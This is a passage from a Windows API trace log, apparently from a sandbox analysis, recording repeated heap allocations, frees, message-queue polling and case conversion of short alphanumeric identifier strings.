Flags=0x0, Size=0x20) returned 0x2a780e8 [0210.405] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0210.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0210.405] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.405] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0210.405] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0210.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a747d8 [0210.405] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0210.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0210.406] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0210.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0210.406] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0210.406] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0210.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a747d8 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0210.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0210.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0210.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0210.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0210.407] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.407] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0210.408] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0210.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf18 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a746b8 [0210.408] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0210.408] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0210.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0210.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0210.408] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.409] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0210.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0210.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0210.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0210.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0210.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.416] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a746b8 | out: hHeap=0x2af0000) returned 1 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.416] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0210.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0210.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0210.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0210.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0210.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0210.417] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0210.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.417] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.418] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.418] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.418] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0210.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0210.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0210.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) 